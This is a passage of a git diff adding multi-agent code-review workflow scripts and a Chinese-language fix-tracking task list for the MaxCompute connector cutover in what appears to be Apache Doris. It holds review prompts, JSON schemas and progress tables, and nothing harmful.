Follower-FE behavior on replay? Image +deserialization of old resource-backed / migrated catalogs (ES/JDBC -> PluginDriven)? The execution ORDER of edit-log +write vs cache invalidation on the master vs legacy? Is the replay key the local or remote name? Are the GSON +catalog/db/table compat registrations all present and consistent?`, + }, + { + key: 'cache', + title: 'Metadata cache', + scope: `CUTOVER: datasource/ExternalMetaCacheMgr; SchemaCache, SchemaCacheValue, PluginDrivenSchemaCacheValue; +ExternalCatalog / ExternalDatabase metaCache + makeSureInitialized / resetMetaCacheNames / unregister* / invalidate; +partition-value sourcing in PluginDrivenExternalTable. +LEGACY BASELINE: maxcompute/MaxComputeExternalMetaCache; maxcompute/MaxComputeSchemaCacheValue.`, + questions: `What schema-cache-value type and fields (partition columns / values / types)? Does legacy keep a second-level +partition-VALUE cache, and does the cutover (per-query connector list vs cached)? Invalidation / refresh / TTL timing vs +legacy? Cast safety of any (PluginDrivenSchemaCacheValue) downcast — can a plain SchemaCacheValue ever be cached for a +PluginDriven table? Row-count / statistics cache? Cache key (NameMapping; local vs remote)?`, + }, + { + key: 'fallback', + title: 'Residual / fallback to legacy logic', + scope: `Cross-cutting. Self-drive with grep + reads across fe/ (and be/ if relevant). Look at EVERY dispatch keyed on +legacy MaxCompute types and any silent fallback: + - grep: "instanceof MaxComputeExternalCatalog", "instanceof MaxComputeExternalTable", "MAX_COMPUTE_EXTERNAL_TABLE", + "registerCompatibleSubtype", and any post-cutover-reachable construction/call of legacy datasource.maxcompute.* classes. + - TableType-driven routing; PluginDrivenExternalTable.toThrift null / SCHEMA_TABLE fallback branch; + BindRelation / getEngine / getEngineTableTypeName routing; the keep-set (image/plan/thrift compat).`, + questions: `After cutover (catalog = PluginDrivenExternalCatalog), which code paths STILL hit legacy MaxCompute logic, or +SILENTLY fall back to a generic/legacy path instead of failing loud? Which keep-set items are necessary compat vs true +residue? Any half-wired dispatch (a BE handler wired but its FE analyze gate not, or vice-versa)? For each, cutover-vs-legacy +diff + regression judgment.`, + }, +] + +// lens angles applied within each domain (clean-room, code-only) +const LENS_ANGLES = [ + { key: 'parity', focus: `LEGACY-PARITY & CORRECTNESS: does the cutover preserve the legacy observable behavior on this path? +Enumerate concrete cutover-vs-legacy differences and classify each as regression / intentional-divergence / none. Verify the +actual data/control flow, not the apparent intent.` }, + { key: 'delivery', focus: `IMPLEMENTATION DELIVERY & EDGE/FALLBACK: does the implementation fully realize what the code +structure implies, or are there gaps, half-wired seams, silent fallbacks, missing fail-loud, untested invariants, or edge +cases (empty/null/zero, name-mapping on, follower/replay, concurrency) that diverge from legacy? Cite file:line.` }, +] + +const FINDINGS_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { + parity_assessment: { type: 'string', description: 'one-paragraph independent verdict: does this path reach legacy parity? design vs implementation gap?' }, + findings: { + type: 'array', + items: { + type: 'object', additionalProperties: false, + properties: { + title: { type: 'string' }, + severity: { type: 'string', enum: ['blocker', 'major', 'minor', 'nit'] }, + category: { type: 'string', enum: ['correctness', 'parity', 'regression', 'design-impl-gap', 'fallback', 'cache', 'replay', 'other'] }, + location: { type: 'string', description: 'file:line' }, + description: { type: 'string' }, + cutover_vs_legacy: { type: 'string', description: 'the concrete behavioral difference' }, + regression: { type: 'string', enum: ['yes', 'no', 'unsure'] }, + why_it_matters: { type: 'string' }, + }, + required: ['title', 'severity', 'category', 'location', 'description', 'cutover_vs_legacy', 'regression', 'why_it_matters'], + }, + }, + }, + required: ['parity_assessment', 'findings'], +} +const VERDICT_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { refuted: { type: 'boolean' }, confidence: { type: 'string', enum: ['low', 'medium', 'high'] }, reasoning: { type: 'string' } }, + required: ['refuted', 'confidence', 'reasoning'], +} +const CROSSCHECK_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { + status: { type: 'string', enum: ['new-gap', 'known-degradation', 'already-handled', 'disagreement-with-history', 'false-positive'] }, + evidence: { type: 'string', description: 'cite the plan-doc section/commit and/or code' }, + recommended_action: { type: 'string' }, + }, + required: ['status', 'evidence', 'recommended_action'], +} + +// ===================== Phase A — clean-room review (per domain x lens) ===================== +phase('Review') +const lenses = LENS_ANGLES.slice(0, Math.max(1, Math.min(LENS_ANGLES.length, lensesPerDomain))) +const reviewJobs = [] +for (const d of DOMAINS) { + for (const lens of lenses) { + reviewJobs.push({ domain: d, lens }) + } +} +const reviewResults = await parallel(reviewJobs.map(job => () => + agent( + `${CLEANROOM}\n\n==== DOMAIN: ${job.domain.title} ====\nSCOPE / ENTRY POINTS:\n${job.domain.scope}\n\nOPEN QUESTIONS (neutral; investigate, do not assume answers):\n${job.domain.questions}\n\nLENS: ${job.lens.focus}\n\nReturn an independent parity_assessment for this domain plus concrete findings (each with file:line, cutover-vs-legacy diff, regression judgment).`, + { label: `review:${job.domain.key}:${job.lens.key}`, phase: 'Review', schema: FINDINGS_SCHEMA } + ).then(r => ({ domain: job.domain.key, lens: job.lens.key, parity_assessment: r && r.parity_assessment, findings: (r && r.findings) || [] })) +)) + +const parityAssessments = reviewResults.filter(Boolean).map(r => ({ domain: r.domain, lens: r.lens, assessment: r.parity_assessment })) +const allFindings = reviewResults.filter(Boolean) + .flatMap(r => r.findings.map(f => ({ ...f, domain: r.domain, lens: r.lens }))) + .map((f, i) => ({ ...f, id: `F${i + 1}` })) +log(`Phase A: ${allFindings.length} raw findings across ${reviewJobs.length} domain x lens reviewers`) + +if (allFindings.length === 0) { + return { verdict: 'clean', parityAssessments, confirmed: [], note: 'No findings surfaced by any clean-room lens.' } +} + +// ===================== Phase B — adversarial verify (code-only) ===================== +phase('Verify') +const verified = await parallel(allFindings.map(f => () => + parallel(Array.from({ length: verifyVotes }, (_, k) => () => + agent( + `${CLEANROOM}\n\nADVERSARIAL VERIFY (skeptic #${k + 1}). Try to REFUTE this finding from code. Default refuted=true unless the code clearly proves a real defect or a real cutover-vs-legacy regression in the CURRENT implementation. Cite file:line.\nDOMAIN: ${f.domain}\nFINDING [${f.severity}/${f.category}] ${f.title}\nLocation: ${f.location}\n${f.description}\nClaimed cutover-vs-legacy: ${f.cutover_vs_legacy}\nWhy: ${f.why_it_matters}`, + { label: `verify:${f.id}.${k + 1}`, phase: 'Verify', schema: VERDICT_SCHEMA } + ) + )).then(votes => { + const v = votes.filter(Boolean) + const confirms = v.filter(x => !x.refuted).length + return { ...f, confirms, votes: v.length, survives: confirms * 2 >= v.length && confirms >= 2 } + }) +)) +const survivors = verified.filter(Boolean).filter(f => f.survives) +log(`Phase B: ${survivors.length}/${allFindings.length} findings survived (majority & >=2 confirm)`) + +if (survivors.length === 0) { + return { + verdict: 'clean', + parityAssessments, + confirmed: [], + allFindings: verified.filter(Boolean).map(f => ({ id: f.id, domain: f.domain, title: f.title, confirms: f.confirms })), + } +} + +// ===================== Phase C — cross-check vs quarantined history (priors UNLOCKED here only) ===================== +phase('CrossCheck') +const QUARANTINE = `Now (and ONLY now) you MAY consult the development history to classify an already-independently-confirmed +finding. Repo root: ${REPO}. Relevant priors: + - plan-doc/tasks/designs/P4-T06d-*-design.md, plan-doc/reviews/P4-T06d-*-review-rounds.md + - plan-doc/tasks/designs/P4-cutover-fix-design.md, plan-doc/reviews/P4-cutover-review-findings.md + - plan-doc/tasks/designs/P4-T05-T06-cutover-design.md, P4-T06c-fe-dispatch-wiring-design.md, P4-batchD-maxcompute-removal-design.md + - plan-doc/decisions-log.md, plan-doc/deviations-log.md, plan-doc/task-list.md +Classify the finding: + - new-gap: a genuine defect/divergence NOT addressed in code and NOT registered anywhere (development missed it). + - known-degradation: explicitly registered as a known/accepted deviation or non-goal. + - already-handled: the code already handles it correctly (the finding is mistaken). + - disagreement-with-history: the history claims this is fixed/correct/non-issue, but the code says otherwise (SURFACE loudly). + - false-positive: not actually true.` +const crossed = await parallel(survivors.map(f => () => + agent( + `${QUARANTINE}\n\nFINDING [${f.severity}/${f.category}] (domain: ${f.domain}, confirms ${f.confirms}/${f.votes})\n${f.title}\nLocation: ${f.location}\n${f.description}\nCutover-vs-legacy: ${f.cutover_vs_legacy} | regression: ${f.regression}`, + { label: `crosscheck:${f.id}`, phase: 'CrossCheck', schema: CROSSCHECK_SCHEMA } + ).then(c => ({ ...f, crosscheck: c })) +)) + +const confirmed = crossed.filter(Boolean) +const newGaps = confirmed.filter(f => f.crosscheck && f.crosscheck.status === 'new-gap') +const disagreements = confirmed.filter(f => f.crosscheck && f.crosscheck.status === 'disagreement-with-history') + +return { + verdict: (newGaps.length === 0 && disagreements.length === 0) ? 'no-new-gaps' : 'attention-needed', + stats: { + domains: DOMAINS.length, reviewers: reviewJobs.length, verifyVotes, + rawFindings: allFindings.length, survived: survivors.length, + newGaps: newGaps.length, disagreements: disagreements.length, + }, + parityAssessments, + newGaps: newGaps.map(f => ({ id: f.id, domain: f.domain, severity: f.severity, title: f.title, location: f.location, description: f.description, cutover_vs_legacy: f.cutover_vs_legacy, regression: f.regression, action: f.crosscheck.recommended_action })), + disagreements: disagreements.map(f => ({ id: f.id, domain: f.domain, severity: f.severity, title: f.title, location: f.location, description: f.description, evidence: f.crosscheck.evidence, action: f.crosscheck.recommended_action })), + confirmed: confirmed.map(f => ({ id: f.id, domain: f.domain, severity: f.severity, category: f.category, title: f.title, location: f.location, regression: f.regression, status: f.crosscheck && f.crosscheck.status, confirms: f.confirms })), +} diff --git a/plan-doc/reviews/prune-pushdown-review.workflow.js b/plan-doc/reviews/prune-pushdown-review.workflow.js new file mode 100644 index 00000000000000..f373a94511328d --- /dev/null +++ b/plan-doc/reviews/prune-pushdown-review.workflow.js @@ -0,0 +1,91 @@ +export const meta = { + name: 'prune-pushdown-review', + description: 'Clean-room adversarial review of FIX-PRUNE-PUSHDOWN (P4-T06e/DG-1) diff: parity, blast-radius, correctness, test-quality', + phases: [ + { title: 'Review', detail: 'independent reviewers, each a distinct lens, over the diff' }, + { title: 'Verify', detail: 'adversarially verify each surfaced finding before reporting' }, + ], +} + +const REPO = '/mnt/disk1/yy/git/wt-catalog-spi' + +// The diff under review (files changed by FIX-PRUNE-PUSHDOWN): +const FILES = [ + 'fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java', + 'fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java', + 'fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java', + 'fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java', + 'fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProviderTest.java', +] + +const CONTEXT = `FIX-PRUNE-PUSHDOWN (P4-T06e / DG-1). Background: in the plugin-driven MaxCompute read path the Nereids partition-pruning result (SelectedPartitions) was computed but dropped at the translator, so the ODPS read session was built over ALL partitions (perf/memory regression; rows still correct). The fix threads it through an additive 6-arg planScan SPI overload. + +Design doc: ${REPO}/plan-doc/tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md +Legacy parity reference: ${REPO}/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java (getSplits():~700-754, three-state requiredPartitionSpecs; startSplit():~236-250). +Inspect the actual diff with: git -C ${REPO} diff HEAD -- (and read full files for context).` + +const FINDINGS_SCHEMA = { + type: 'object', + additionalProperties: false, + required: ['findings'], + properties: { + findings: { + type: 'array', + items: { + type: 'object', + additionalProperties: false, + required: ['title', 'severity', 'category', 'fileLine', 'detail', 'suggestedFix'], + properties: { + title: { type: 'string' }, + severity: { type: 'string', enum: ['blocker', 'major', 'minor', 'nit'] }, + category: { type: 'string', enum: ['parity', 'correctness', 'blast-radius', 'test-quality', 'style', 'doc'] }, + fileLine: { type: 'string' }, + detail: { type: 'string', description: 'what is wrong and why it matters' }, + suggestedFix: { type: 'string' }, + }, + }, + }, + }, +} + +const VERDICT_SCHEMA = { + type: 'object', + additionalProperties: false, + required: ['title', 'isReal', 'mustFix', 'reasoning', 'evidence'], + properties: { + title: { type: 'string' }, + isReal: { type: 'boolean', description: 'true if the finding is a genuine defect after independent code re-check' }, + mustFix: { type: 'boolean', description: 'true if it must be fixed before commit (blocker/major real defect)' }, + reasoning: { type: 'string' }, + evidence: { type: 'array', items: { type: 'string', description: 'file:line' } }, + }, +} + +phase('Review') + +const LENSES = [ + { key: 'parity', prompt: `You are a SKEPTICAL reviewer. Lens: LEGACY PARITY. Does the fix faithfully mirror legacy MaxComputeScanNode partition pushdown? Check: (1) three-state mapping (NOT_PRUNED/not-pruned -> scan all; pruned non-empty -> subset; pruned empty -> short-circuit no splits) vs legacy getSplits():718-731; (2) name->PartitionSpec conversion matches legacy new PartitionSpec(key); (3) BOTH read-session paths (standard + limit-opt) receive requiredPartitions, matching legacy getSplits + getSplitsWithLimitOptimization; (4) the limit-opt eligibility / behavior is unchanged. Report any divergence from legacy semantics.` }, + { key: 'correctness', prompt: `You are a SKEPTICAL reviewer. Lens: CORRECTNESS. Could the change drop or duplicate rows, NPE, or mis-handle edge cases? Check: (1) null vs empty-list semantics of requiredPartitions end-to-end (resolveRequiredPartitions -> getSplits short-circuit -> planScan -> toPartitionSpecs); (2) the short-circuit returns no splits ONLY when genuinely pruned-to-zero, never when not-pruned; (3) SelectedPartitions.isPruned is the right gate (vs legacy != NOT_PRUNED); (4) default field value NOT_PRUNED keeps non-MaxCompute / non-pruned behavior identical; (5) thread-safety / shared-state concerns. Report real correctness risks.` }, + { key: 'blast-radius', prompt: `You are a SKEPTICAL reviewer. Lens: BLAST RADIUS / SPI. The fix adds a 6-arg planScan default-method overload. Verify: (1) the other 6 connector providers (es/jdbc/hive/paimon/hudi/trino) are genuinely unaffected (inherit the default that delegates to their existing planScan); (2) no existing caller of the 4/5-arg planScan breaks; (3) the new default method correctly delegates; (4) the MaxCompute 5-arg now delegates to 6-arg(null) without behavior change for existing callers (e.g. passthrough/TVF); (5) the SPI javadoc contract is accurate. Also: is the Hudi-SPI plugin branch (visitPhysicalHudiScan) being left unwired a real gap or acceptable scope? Report issues.` }, + { key: 'test-quality', prompt: `You are a SKEPTICAL reviewer. Lens: TEST QUALITY (Rule 9: tests must fail when business logic changes). For PluginDrivenScanNodePartitionPruningTest and MaxComputeScanPlanProviderTest: (1) would each test actually go RED if the pruning logic were reverted/mutated (e.g. resolveRequiredPartitions always returns null, or toPartitionSpecs always returns empty)? (2) are the null-vs-empty distinctions actually asserted? (3) is anything important UNtested (the getSplits short-circuit branch, the translator wiring, the limit-opt path threading)? (4) any vacuous assertions? Report weak/missing coverage and whether the untested seams are acceptable (documented as live-e2e gate) or a gap.` }, +] + +const reviews = await pipeline( + LENSES, + l => agent(`Clean-room review in ${REPO}.\n${CONTEXT}\n\n${l.prompt}\n\nFiles in the diff:\n${FILES.map(f => '- ' + f).join('\n')}\n\nRead the ACTUAL code (and git diff). Return only genuine findings; empty list is fine if the lens is clean.`, + { label: `review:${l.key}`, phase: 'Review', schema: FINDINGS_SCHEMA, agentType: 'Explore' }), + (review, l) => parallel((review.findings || []).map(f => () => + agent(`Clean-room adversarial verification in ${REPO}.\n${CONTEXT}\n\nA reviewer (${l.key} lens) raised this finding. Independently re-check the code and decide if it is REAL and MUST-FIX. Be adversarial toward the finding — try to show it is wrong/non-issue. Default mustFix=false unless it is a genuine blocker/major defect.\n\nFINDING: ${f.title}\nSEVERITY(claimed): ${f.severity}\nCATEGORY: ${f.category}\nLOCATION: ${f.fileLine}\nDETAIL: ${f.detail}\nSUGGESTED FIX: ${f.suggestedFix}\n\nRead the actual code and return your verdict with file:line evidence.`, + { label: `verify:${(f.fileLine || l.key).slice(0, 40)}`, phase: 'Verify', schema: VERDICT_SCHEMA }) + .then(v => ({ lens: l.key, claimedSeverity: f.severity, category: f.category, fileLine: f.fileLine, ...v })) + )) +) + +const allVerdicts = reviews.flat().filter(Boolean) +return { + total: allVerdicts.length, + real: allVerdicts.filter(v => v.isReal), + mustFix: allVerdicts.filter(v => v.mustFix), + allVerdicts, +} diff --git a/plan-doc/task-list-P4-rereview.md b/plan-doc/task-list-P4-rereview.md new file mode 100644 index 00000000000000..82e3ddbd7b8381 --- /dev/null +++ b/plan-doc/task-list-P4-rereview.md @@ -0,0 +1,66 @@ +# P4 复审发现修复 Task List(re-review round) + +> 来源:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`(8 newGaps ∪ 6 disagreements,verdict `attention-needed`)。 +> 前置:P4-T06d 6 fix 已 DONE(见 `plan-doc/task-list.md`)。本轮处理复审**新**发现。 +> 流程(用户定):每 issue = 独立设计文档 → 修复 → 编译+UT(无 e2e) → 对抗 review agent → review 有问题则回设计循环(最多 5 轮)→ 记录每轮结论防跨轮矛盾 → 独立 commit + summary + 更新本表。 +> 每 issue 产物: +> - 设计:`plan-doc/tasks/designs/P4-T06e--design.md`(跨轮更新) +> - review 轮次记录:`plan-doc/reviews/P4-T06e--review-rounds.md`(每轮 finding+verdict+处置) +> - summary:写回本文件「review 轮次累计结论」+ 设计文档尾 + +## ▶ RESUME(fresh session 从这里接) + +- **当前**:**✅ F9 FIX-CAST-PUSHDOWN DONE**(commit `cc32521ed99`;横切复查升级——原 review 误判 known-degr,复查 `wzoa6dkvw` 0/3 refuted 证为**未登记静默丢行回归**,用户定 Fix:连接器 `supportsCastPredicatePushdown=false` 恢复 legacy parity + fe-core getSplits 剥壳时抑制 source LIMIT[impl-review F9-LIMITOPT-1 折入];守门 连接器 UT 2-2+mut、fe-core LimitStrip 2-2+BatchMode 9-9+mut 2-2、checkstyle 0、import-gate;真值闸 live ODPS=DV-020)。**P3 全清 + 整个 P4-rereview triage(12 issue)全完成**。**剩余横切**(见 HANDOFF):Batch-D 红线扩充复查(余 3 文件)、doc-sync 欠账(P2)、**live e2e 终验(DV-013..020,真实 ODPS)**、Batch-D 删 legacy(gated on live)。 + - 已完成:P0-1 FIX-OVERWRITE-GATE(2 轮,`59699a62f33`)、P0-2 FIX-WRITE-DISTRIBUTION(1 轮,`f0adedba20c`)、P0-3 FIX-BIND-STATIC-PARTITION(3 轮,`7cc86c66440`)、P1-4 FIX-PRUNE-PUSHDOWN(1 轮,`072cd545c54`)、P2-5 FIX-DROP-DB-FORCE(1 轮,`99d5c9d527c`)、P2-6 FIX-CREATE-DB-PRECHECK(1 轮,`ff52f8fd478`)、P2-7 FIX-CTAS-IF-NOT-EXISTS(1 轮,`7051b75c197`)、P2-8 FIX-AUTOINC-REJECT(1 轮,`4aa680f3e3b`)、P3-9 FIX-LIMIT-SPLIT-DEFAULT(设计验证+impl review 收敛,`952b08e0cc8`)、P3-10 FIX-ISKEY-METADATA(设计验证+impl review 0 mustFix,`1b44cd4f065`)、P3-12 FIX-POSTCOMMIT-REFRESH(无逻辑改动 DV+Javadoc,`1f2e00d3696`)、**P3-11 FIX-BATCH-MODE-SPLIT(Shape A batch SPI 路径,设计验证+impl-review GO-WITH-EDITS 折入,`ac8f0fc15eb`)**。 + - ✅ **doc-sync(P1-4 随本 commit 落)**:`decisions-log` D-031、`deviations-log` DV-015(+补 DV-014 详细段、计数 14→15)、`FIX-PART-GATES` design/review-rounds「pruning 不变式 clean」⚠️ 更正、D-028 ⚠️ 补注。**前序遗留**(P0-3 doc-sync 大体已落:D-030/DV-014 索引在;本次补齐 DV-014 详细段)。 +- 动手前按指针核码(Rule 8)。triage 顺序 = 3 写 blocker → DG-1 裁剪透传 → DB-DDL/CTAS → 写并行+limit 默认 → minors(报告 §E.7)。 +- **operational**(来自 HANDOFF / auto-memory):maven 必绝对 `-f` + `-pl`(改 fe-core 带 `:fe-core -am`,改连接器带 `:fe-connector-maxcompute`);带 `-Dmaven.build.cache.enabled=false`;读真实 `Tests run:`/`BUILD`/`MVN_EXIT`,**勿信**后台 task 通知 exit code;checkstyle `-pl :fe-core checkstyle:check`;import-gate `bash tools/check-connector-imports.sh`。分支 `catalog-spi-05`,本地不 push,每 issue 独立 commit(msg 用 `[P4-T06e] ...`)。 +- **clean-room 对抗 review 偏好**:多 agent 对抗 + 先 code 独立判断、后交叉核对历史结论(auto-memory `clean-room-adversarial-review-pref`)。 + +## 进度 + +| # | issue | sev | layer | 决策类型 | 设计 | 实现 | 编译+UT | review 轮次 | 状态 | +|---|---|---|---|---|---|---|---|---|---| +| P0-1 | FIX-OVERWRITE-GATE | blocker | fe-core+connector(SPI cap) | 明确修复 | ✅ | ✅ | ✅ | 2 轮→收敛 | ✅ DONE (`59699a62f33`) | +| P0-2 | FIX-WRITE-DISTRIBUTION | blocker+major | fe-core+connector(SPI cap) | 明确修复 | ✅ | ✅ | ✅ | 1 轮→收敛(0 must-fix) | ✅ DONE (`f0adedba20c`) | +| P0-3 | FIX-BIND-STATIC-PARTITION | blocker | fe-core+SPI cap(+revise P0-2 dist 索引) | 明确修复(用户批准扩 scope:新增 capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`+回退 P0-2 cols→full-schema 索引) | ✅ | ✅ | ✅ | 3 轮→收敛(0 mustFix) | ✅ DONE (`7cc86c66440`) | +| P1-4 | FIX-PRUNE-PUSHDOWN | major | fe-core+connector(SPI) | 明确修复(用户批准「Fix it」:additive 6 参 planScan overload) | ✅ | ✅ | ✅ | 1 轮→收敛(0 mustFix) | ✅ DONE (`072cd545c54`) | +| P2-5 | FIX-DROP-DB-FORCE | major | SPI+connector+fe-core | 扩 SPI dropDatabase 带 force(用户定) | ✅ | ✅ | ✅ | 1 轮→收敛(0 mustFix) | ✅ DONE (`99d5c9d527c`) | +| P2-6 | FIX-CREATE-DB-PRECHECK | major | SPI+fe-core | 能力门闸 supportsCreateDatabase(用户定) | ✅ | ✅ | ✅ | 1 轮→收敛(0 mustFix) | ✅ DONE (`ff52f8fd478`) | +| P2-7 | FIX-CTAS-IF-NOT-EXISTS | major | fe-core | 明确修复 | ✅ | ✅ | ✅ | 1 轮→收敛(0 mustFix) | ✅ DONE (`7051b75c197`) | +| P2-8 | FIX-AUTOINC-REJECT | minor | SPI(ConnectorColumn)+connector+fe-core | 加 isAutoInc SPI 字段(用户定) | ✅ | ✅ | ✅ | 1 轮→收敛(0 mustFix) | ✅ DONE (`4aa680f3e3b`) | +| P3-9 | FIX-LIMIT-SPLIT-DEFAULT | major | connector | 明确修复(用户定「Fix 恢复三重闸」,连接器局部无 SPI) | ✅ | ✅ | ✅ | 设计验证 0mF + impl 1 轮(1 mustFix→补测)收敛 | ✅ DONE (`952b08e0cc8`) | +| P3-10 | FIX-ISKEY-METADATA | minor | connector | 明确修复(用户定「Fix isKey=true」,连接器局部无 SPI) | ✅ | ✅ | ✅ | 设计验证 0mF + impl 0mF | ✅ DONE (`1b44cd4f065`) | +| P3-11 | FIX-BATCH-MODE-SPLIT | minor | SPI+connector+fe-core | **用户定「实现 batch SPI 路径」**(Shape A 薄 SPI+fe-core 编排,逐字镜像 legacy) | ✅ | ✅ | ✅ | 设计验证 `wcpg9lblj` 0mF+2sF→折入(SF-1 NPE);impl-review `wve7y1jst` 0mF+1sF+2nit→折入 | ✅ DONE (`ac8f0fc15eb`) | +| P3-12 | FIX-POSTCOMMIT-REFRESH | minor | fe-core | 无产线逻辑改动,DV-018+Javadoc 泛化(用户定) | ✅ | ✅ | ✅ | 对抗性安全核查 inline(handleRefreshTable=缓存/editlog 自愈)0 mustFix | ✅ DONE (`1f2e00d3696`) | +| F9 | FIX-CAST-PUSHDOWN | **major(correctness)** | connector+fe-core | **横切复查升级**:原 review 误判 known-degr,复查 `wzoa6dkvw` 0/3 refuted 证为**未登记静默丢行回归**(用户定 Fix) | ✅ | ✅ | ✅ | 复查 0/3 refuted;impl-review `wj2h0120n` 1sF(limit-opt 交互)→折入 | ✅ DONE (`cc32521ed99`) | + +图例:⬜ 未开始 / 🔄 进行中 / ✅ 完成 + +## 横切(全程守 / 别忘) + +- 🔴 **Batch-D 红线扩充**:删 legacy 前须先在 PluginDriven/connector 路径补齐 → `PhysicalMaxComputeTableSink`(写分发唯一副本,P0-2)、`allowInsertOverwrite` 的 MC 分支(P0-1)、`bindMaxComputeTableSink` 静态分区过滤(P0-3)。复查 Batch-D 设计「zero survivor」声明。 +- 🟡 **F9 CAST 谓词剥壳下推 ODPS → 可能丢行**(correctness, confirms 3/3,`ExprToConnectorExpressionConverter.java:108-109`):虽归「已登记降级」,属正确性/丢行风险,二次确认是否真安全/真已登记。 +- 📝 **doc-sync**:修复同时更正各 design/decisions-log/deviations-log 措辞。**✅ DG-1 已更正(P1-4 随 commit)**:FIX-PART-GATES design/review-rounds「pruning 不变式 clean」⚠️ 注 = 仅元数据可见性、read-session 下推由 D-031 补;D-028 ⚠️ 补注。**剩余**:DG-2 证伪 DECISION-3「忠实镜像」、DG-4/DG-6 task-list「6/6 完成」(随对应 P2+ 项落地时更正)。 + +## review 轮次累计结论(防跨轮矛盾,精简索引;详见各 issue round 文件) + +- **P3-10 FIX-ISKEY-METADATA(设计验证 0mF + impl review 0mF,commit `1b44cd4f065`)**: 翻闸后 `MaxComputeConnectorMetadata.getTableSchema:138/150` 用 5 参 `ConnectorColumn` ctor(isKey 默认 false)→ `DESCRIBE` 显示 Key=NO;legacy `MaxComputeExternalTable.initSchema:177/189` 全列 isKey=true(NG-6/F3/F10 minor)。**用户定 Fix(isKey=true)**。**改 1 prod + 1 测**:抽 `buildColumn(name,type,comment,nullable)` 静态助手用 6 参 ctor 置 isKey=true,data+partition 两 loop 经之;converter 已透传。**守门**:连接器 compile BUILD SUCCESS、UT 3/3(+collateral 37/37)、checkstyle 0、import-gate 净、mutation killed(buildColumn isKey true→false→Failures 2)。**设计验证**(`wa9t0emta`,3 lens) 0 mustFix:① **作用域更正**(shouldFix)`information_schema.columns.COLUMN_KEY` 受 `FrontendServiceImpl:962-965` OlapTable 门控、MC 前后皆空已 parity→本修**仅 DESCRIBE**(删 info_schema 断言);② **非纯展示**(nit)isKey 亦喂 `UnequalPredicateInfer:278`+BE descriptor,但 legacy 即喂 true→恢复既有值;③ 第三 `ConnectorColumn` site `PluginDrivenExternalTable:139-140`(rename) 透传 isKey 无害;④ helper 保留(mutation guard+intent,ctor isKey 已 `ConnectorColumnTest:63` pin)。**Round 1 impl review**(`wrx0n11ol`,2 lens): 0 mustFix/0 shouldFix(correctness-parity 0 findings;test-quality 2 nit:mutation/非真空已核实 + wiring 无 offline 测=DV-017 已披露,javadoc 措辞精化为 Table package-private ctor+无 Mockito)。**doc-sync 随本 commit**:D-033、DV-017。详见 `plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md`。 + +- **P3-9 FIX-LIMIT-SPLIT-DEFAULT(设计验证 0mF + impl review 1 轮收敛,commit `952b08e0cc8`)**: 翻闸后 `MaxComputeScanPlanProvider.planScan:199-202` 丢 legacy 三重闸——`checkOnlyPartitionEquality` 恒 false stub + 从不读 `enable_mc_limit_split_optimization`(默认 false)→ `useLimitOpt=limit>0 && !filter.isPresent()`:无过滤 LIMIT 默认压成单 row-offset split(语义反转 + 静默无视 session var),分区等值 LIMIT 路径永不触发(NG-5/F11 major;并闭 F2/F12 minors)。**用户定 Fix**。**改 1 prod + 1 测**:① 加常量 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION`(hardcode 串、禁 fe-core 依赖、同 JDBC 约定)经 `getSessionProperties()`(live `from(ctx)`→`VariableMgr.toMap` 填)读 gate(1);② 真 `checkOnlyPartitionEquality` 遍历 `ConnectorExpression`(`ConnectorAnd` 全 conjunct / `ConnectorComparison` EQ col 左 lit 右 / `ConnectorIn` 非 NOT-IN value 为分区列全 literal)镜像 legacy;③ 纯静态 `shouldUseLimitOptimization` 合成三重闸。**守门**:连接器 compile BUILD SUCCESS、UT 26/26、checkstyle 0、import-gate 净、mutation 8 向红(A 默认 false→true / B EQ ==→!= / C 去 RHS-literal / D 去 AND-loop ! / E 去 NOT-IN 守卫 / F1 去 var 守卫 / F2 limit<=0→<0 / G 去 IN-value 守卫)。**设计验证**(`w17wzd0el`,4 lens) 0 mustFix(折入 1 shouldFix=RHS-literal 测 + CAST-unwrap DV 拓宽)。**Round 1 impl review**(`walkff1vf`,4 lens): 1 **mustFix**(IN-value 守卫 `!isPartitionColumnRef(in.getValue())` 缺杀手测——所有 IN 测都用分区列作 value,丢该守卫的 mutant 存活;真正确性不变式镜像 legacy `:358-364`,回归会令 `data_col IN(...) LIMIT n`+var ON 静默少读)→**补 `testInValueDataColumnIneligible`+mutation G 确认**;余 nit(LIMIT 0 路径差/嵌套-AND 拓宽/empty-IN 皆 correctness-safe 入 DV-016;EQ_FOR_NULL/both-literal/non-leaf 补测)。**doc-sync 随本 commit**:D-032、DV-016(CAST-unwrap+嵌套-AND+LIMIT0+wiring gap+F2/F12 闭)。详见 `plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md`。 + +- **P2-8 FIX-AUTOINC-REJECT(1 轮收敛 0 mustFix,commit `4aa680f3e3b`)**: 翻闸后 `ConnectorColumn` 无 isAutoInc 载体 → AUTO_INCREMENT flag 在到连接器前被丢 → `CREATE TABLE (id INT AUTO_INCREMENT)` 静默建普通列(数据模型回归;legacy `validateColumns:422-425` 显式拒)。nereids `ColumnDefinition.validate(isOlap=false)` 不拒 bare auto-inc(仅 generated 列),故 migration 文档"nereids 已拒"对 auto-inc 为假(DG-5/F24 minor)。**用户定加 SPI 字段**。**改 3 prod+3 测**:① `ConnectorColumn` additive isAutoInc(7 参 ctor,6→7 false/5 不变,getter,equals/hashCode 纳入);② converter 透传 `getAutoIncInitValue()!=-1`;③ `MaxComputeConnectorMetadata.validateColumns` 循环首拒(镜像 